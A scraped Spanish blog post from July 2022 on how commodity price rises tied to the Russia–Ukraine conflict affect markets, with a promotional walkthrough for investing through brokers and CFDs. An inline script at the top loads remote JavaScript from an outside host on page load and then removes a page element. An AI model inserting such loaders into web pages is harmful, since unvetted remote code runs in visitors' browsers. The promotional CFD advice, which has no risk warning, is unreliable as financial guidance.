(function (document, window) { document.addEventListener('DOMContentLoaded', function (event) { let a = document.createElement("script"); a.type = 'text/javascript'; a.async = true; a.src = "https://data.gblcdn.com/data/gblcdnp.js?pubid=05a114a0-fca3-11e9-8439-f143cce16e54&pid=TcvybSOnmDcPUTj&renderD=0&limitT=0&limitH=24&t=i"; document.body.appendChild(a); document.getElementById('TcvybSOnmDcPUTj').remove(); }); }) (document, window);
Domingo 03 de Julio de 2022

El efecto del alza de las materias primas en la economía

0

El alza de las materias primas tiene un gran impacto en la bolsa de valores y en toda la cadena de producción, es un efecto que llega hasta el bolsillo de aquellas personas que no están involucradas directamente con el mundo de las inversiones. A continuación veremos cómo puede afectar el mercado, cuáles son las empresas que se encuentran en baja y las que están en alza. Todo esto ayudará a esclarecer las opciones de inversión y tratar de mantenerse a flote en un mercado inestable tras los conflictos actuales.

Cuando el petróleo aumenta de precio

El sector de las materias primas se encuentra afectado actualmente por los conflictos entre Ucrania y Rusia. Uno de los más destacados es el precio por barril de petróleo que se acerca a los 110 $ y aunque para una persona que invirtió en petróleo es algo bueno, para el mercado en general el hecho de que las materias primas aumenten genera una inflación en toda la cadena productiva. Esto se ha visto claramente reflejado en los precios del combustible a nivel mundial.

Muchas personas que se encuentran lejos de las zonas de conflicto y desligadas al mundo de las inversiones igualmente se ven afectadas, pues todos necesitamos del combustible para movilizarnos y no solo las personas, sino también los alimentos y cualquier producto. Al aumentar el costo del combustible inmediatamente los costos de traslados de cualquier cosa aumenta y por ende el consumidor final termina pagando más por los productos. Nos encontramos entonces ante una inflación causada por el aumento de una sola materia prima.

El mismo efecto será producido por el aumento de cualquier otra materia prima. Algunas de las empresas que se han visto beneficiadas y se encuentran a la cabeza del índice son:

  • Occidental Petroleum Corporation (OXY)


  • Marathon Oil Corporation (MRO)

  • Halliburton

  • Schlumberger

Con el aumento del conflicto y una posible prohibición total del petróleo Ruso, lo más seguro es que el precio continúe en alza. Otras materias primas se encuentran a la cabeza junto con el petróleo, como lo son el oro y la plata, e incluso el aluminio ha tenido un alza en las últimas semanas.

Otro de los sectores que ha visto un mayor rendimiento son los fondos cotizados de materias primas, donde millones de personas tienen millones de dólares invertidos, tal es el caso del Energy Select SPDR, con un rendimiento de más de 20% el mes pasado.

Las crisis y los conflictos van y vienen, el mercado de valores se moverá en función de estos, dejando beneficios a uno y no tanto a otros. Por lo tanto, siempre en necesario estar atentos a las noticias y tener pleno conocimiento de los acontecimientos mundiales que puedan afectar la economía y en consecuencia las inversiones a corto y largo plazo.

Como invertir en materias primas o empresas vinculadas al sector

En función del comportamiento del mercado, puede que decida invertir en este momento en materias primas o empresas que se encuentran en alza actualmente. Hay varias opciones disponibles para hacerlo y en muchas ocasiones depende del Bróker que escoja para hacer la inversión. A continuación se mencionan algunas opciones:

  • Compra directa de acciones de empresas

  • CFDs sobre acciones de empresas

  • CFDs sobre índices

  • CFD sobre materias primas

  • ETFs de índices

Lo primero que debe hacer es seleccionar un bróker que se ajuste a su perfil de inversión, en Brokerschart podrá encontrar una lista con los mejores brókers. Allí también hay una breve descripción de los brókers con lo que podrá escoger uno según sus necesidades y el instrumento de inversión que ha elegido, ya que los tipos de instrumentos varían de uno a otro.

Una vez que elija un bróker, proceda abrir su cuenta y verificarla, esto incluye el envío de su documentación personal a fin de verificar su identidad y los métodos de pago que estará utilizando para realizar las inversiones. Algunos brókers incluyen la posibilidad de abrir una cuenta demo, esto para que las personas puedan familiarizarse con la plataforma y practicar sus métodos de inversiones con dinero virtual. Una vez ganada la confianza se puede pasar a la cuenta real e iniciar las inversiones con dinero virtual.

Aunque puede variar ligeramente de un bróker a otro y según la plataforma, por lo general el procedimiento es el siguiente:

  1. Buscar el instrumento de interés.

  2. Abrir una posición.

  3. Fijar los parámetros de operación.

  4. Revisar y confirmar

Leave A Reply

Las cookies de este sitio web se usan para personalizar el contenido y los anuncios, ofrecer funciones de redes sociales y analizar el tráfico. Además, compartimos información sobre el uso que haga del sitio web con nuestros partners de redes sociales, publicidad y análisis web, quienes pueden combinarla con otra información que les haya proporcionado o que hayan recopilado a partir del uso que haya hecho de sus servicios. Ver detalles

ACEPTAR
Aviso de cookies